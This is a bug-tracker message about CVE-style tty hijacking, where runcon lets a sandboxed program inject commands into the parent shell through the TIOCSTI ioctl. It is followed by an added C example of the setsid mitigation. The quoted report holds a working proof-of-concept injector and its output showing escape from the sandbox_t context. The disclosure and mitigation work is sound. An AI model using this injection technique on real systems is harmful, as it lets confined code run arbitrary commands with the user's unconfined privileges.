bug#24541: runcon tty hijacking via TIOCSTI ioctl
From: Pádraig Brady
Subject: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 26 Sep 2016 11:16:37 +0100
User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0
On 25/09/16 12:39, address@hidden wrote:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
>     char *cmd = "id\n";
>     while(*cmd)
>         ioctl(0, TIOCSTI, cmd++);
>     execlp("/bin/id", "id", NULL);
> }
> $ gcc test.c -o test
> $ runcon -t sandbox_t ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
> $ id <--- did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
> https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379
There are side effects to that though, like not being able to background tasks
etc.?
There's a collection of links on the issue at https://bugs.debian.org/816320
If setsid was an option, one could use `runcon ... setsid the_command`,
though that would be a less secure operation by default.
The same issue impacts chroot(1) somewhat also.
I'm not sure of the best fix here.
Pádraig
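The setsid mitigation discussed in this thread, as an added example written for this page (it is not coreutils code and not the SELinux sandbox patch): a small wrapper that forks, places the child in a new session with setsid(), and only then runs the command. A process in its own session has no controlling terminal, and the kernel's TIOCSTI handler refuses to inject input into a tty that is not the caller's controlling terminal, so a child that merely inherited the terminal as fd 0 can no longer type into the parent shell. The function names (`has_controlling_tty`, `run_detached`, `detached_child_has_no_tty`) are this example's own.

```c
/* detach_exec.c: run a command in a new session so that it has no
 * controlling terminal (the `runcon ... setsid the_command` idea from
 * the thread, done in C).  Example code for this thread, not coreutils. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if the calling process has a controlling terminal, else 0.
 * open("/dev/tty") succeeds only for processes that have one; a session
 * leader without a controlling tty gets ENXIO. */
int has_controlling_tty(void)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        return 0;
    close(fd);
    return 1;
}

/* Fork, put the child into a fresh session, and run fn there.  setsid()
 * cannot fail with EPERM in a just-forked child, because a fresh child is
 * never a process-group leader.  Returns the child's exit status, or -1. */
static int run_in_new_session(int (*fn)(void *), void *arg)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setsid() < 0)
            _exit(2);                 /* could not detach: refuse to run */
        _exit(fn(arg) & 0xff);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (WIFEXITED(status))
        return WEXITSTATUS(status);
    return 128 + WTERMSIG(status);    /* shell-style status for signals */
}

static int check_detached(void *unused)
{
    (void)unused;
    return has_controlling_tty();     /* 0 == detached, which is what we want */
}

/* Self-check: a child placed in its own session must report no controlling
 * tty.  Returns 0 when the mitigation is in effect, 1 if the child still
 * has a controlling terminal, 2 if setsid() failed. */
int detached_child_has_no_tty(void)
{
    return run_in_new_session(check_detached, NULL);
}

static int exec_argv(void *arg)
{
    char **argv = arg;
    execvp(argv[0], argv);
    perror(argv[0]);
    return 127;                       /* exec failed: conventional status */
}

/* Run argv[0] with the given argv in a new session; returns its exit status. */
int run_detached(char *const argv[])
{
    return run_in_new_session(exec_argv, (void *)argv);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    int status = run_detached(argv + 1);
    return status < 0 ? 1 : status;
}
```

This also makes the side effect Pádraig mentions visible: because the command is no longer in the terminal's foreground process group, it does not receive job-control signals from the tty (Ctrl-Z and Ctrl-C do not reach it), which is why making this the default behaviour of runcon is a trade-off rather than a free fix.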